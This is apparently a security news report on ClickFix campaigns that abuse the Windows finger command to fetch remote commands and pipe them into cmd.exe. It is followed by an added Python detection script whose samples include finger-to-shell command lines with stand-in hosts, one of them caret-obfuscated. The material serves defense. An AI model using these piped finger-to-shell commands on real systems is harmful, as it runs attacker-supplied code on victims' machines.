
Decades-old ‘Finger’ protocol abused in ClickFix malware attacks


The decades-old "finger" command is making a comeback, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.

In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol; the command was later added to Windows. While still supported, it's rarely used today compared to its popularity decades ago.

When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.

Finger command output

Source: BleepingComputer

Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.

This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.

Abusing the finger command

Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the "finger [email protected][.]com" command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.

Batch file running the finger command to retrieve a script
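For defenders, the pattern described above (a remote finger query whose output is piped into a command interpreter) can be triaged from process command-line telemetry. The following is an added example, not code from the article or the researchers; the function names, the heuristics and the sample command lines (using `example.test` hosts) are constructed for illustration.

```python
import re

# finger at a command position: start of a pipeline stage, after & or (, or after cmd /c or /k.
FINGER = re.compile(
    r'(?:^|[&(]|/[ck]\s)\s*(?:[a-z]:)?(?:[\w.\-]*\\)*finger(?:\.exe)?(?=\s|$)')
# Windows syntax is "finger [-l] [user]@host"; an @host argument means a remote query.
REMOTE = re.compile(r'(?:^|\s)[\w.\-]*@[\w.\-]+')
# A later pipeline stage that starts a command interpreter.
SHELL = re.compile(r'(?:[a-z]:)?(?:[\w.\-]*\\)*(?:cmd|powershell|pwsh)(?:\.exe)?(?=\s|$)')


def normalize(cmdline):
    """Drop carets and quotes, which cmd.exe strips, so f^ing^er still matches."""
    return re.sub(r'[\^"]', '', cmdline).lower()


def classify(cmdline):
    """Return 'none', 'local', 'remote' or 'remote_piped_to_shell' (heuristic)."""
    # Split on single pipes only; '||' is a conditional operator, not a pipe.
    stages = [s.strip() for s in re.split(r'(?<!\|)\|(?!\|)', normalize(cmdline))]
    for i, stage in enumerate(stages):
        m = FINGER.search(stage)
        if not m:
            continue
        if not REMOTE.search(stage[m.end():]):
            return 'local'  # plain user lookup on this host
        piped = any(SHELL.match(later) for later in stages[i + 1:])
        return 'remote_piped_to_shell' if piped else 'remote'
    return 'none'


# Constructed sample command lines, as they might appear in process-creation logs.
SAMPLES = [
    'cmd /c finger user@host.example.test | cmd',
    'f^in^ger u@h.example.test|c^md',
    'finger @host.example.test',
    r'C:\Windows\System32\finger.exe alice',
    r'notepad C:\docs\fingerprint.txt',
]


def triage(samples):
    """Pair each command line with its verdict."""
    return [(classify(c), c) for c in samples]


if __name__ == '__main__':
    for verdict, cmd in triage(SAMPLES):
        print(f'{verdict:24} {cmd}')
```

The `remote` verdict covers the finger.exe child process itself, whose own command line never contains the pipe; the piped verdict applies to the parent shell's command line.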
